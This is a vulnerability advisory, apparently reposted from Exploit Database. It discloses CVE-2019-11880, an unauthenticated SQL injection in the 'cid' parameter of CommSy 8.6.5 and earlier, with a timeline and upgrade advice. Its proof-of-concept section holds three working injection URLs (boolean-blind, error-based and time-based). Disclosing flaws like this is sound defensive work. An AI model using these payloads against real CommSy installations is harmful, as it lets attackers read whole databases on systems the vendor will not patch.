CommSy 8.6.5 – SQL injection

• Exploit Database
• 17 阅读

• 作者： Jens Regel
  日期： 2019-05-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46849/

• Title:
  ======
  CommSy 8.6.5 - SQL injection
  
  Researcher:
  ===========
  Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
  
  CVE-ID:
  =======
  CVE-2019-11880
  
  Timeline:
  =========
  2019-04-15 Vulnerability discovered
  2019-04-15 Asked for security contact and PGP key
  2019-04-16 Send details to the vendor
  2019-05-07 Flaw was approved but will not be fixed in branch 8.6
  2019-05-15 Public disclosure
  
  Affected Products:
  ==================
  CommSy <= 8.6.5
  
  Vendor Homepage:
  ================
  Startseite
  
  
  Details:
  ========
  CommSy is a web-based community system, originally developed at the
  University of Hamburg, Germany, to support learning/working communities.
  We have discovered a unauthenticated SQL injection vulnerability in
  CommSy <= 8.6.5 that makes it possible to read all database content. The
  vulnerability exists in the HTTP GET parameter "cid".
  
  Proof of Concept:
  =================
  boolean-based blind:
  commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
  ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
  
  error-based:
  commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
  COUNT(*),CONCAT(0x716a767871,(SELECT
  (ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
  INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
  
  time-based blind:
  commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
  
  Fix:
  ====
  According to the manufacturer, the version branch 8.6 is no longer
  supported and the vulnerability will not be fixed. Customers should
  update to the newest version 9.2.